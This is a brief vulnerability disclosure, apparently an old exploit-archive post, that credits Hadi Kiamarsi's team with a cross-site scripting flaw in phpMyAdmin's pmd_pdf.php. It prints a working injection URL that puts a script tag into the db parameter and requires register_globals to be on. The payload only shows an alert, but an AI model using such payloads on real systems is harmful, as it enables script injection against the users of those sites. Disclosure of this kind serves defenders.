Author : Hadi Kiamarsi
Discovered by : Hadi Kiamarsi
Exploited By : Hadi Kiamarsi
E-Mail : hadikiamarsi[at]hotmail.com
web site : www.ircrash.com
members team : Hadi Kiamarsi - khashayar fereidani - sina yazdanmehr
Sript Name : phpmyadmin ( All version )
Download Script : http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-3.0.0-all-languages.zip?download
XSS
Exploit :
register_globals=on
query : http://[www.example.com]/pmd_pdf.php?db=>"><script>alert('Hadi-Kiamarsi')</script>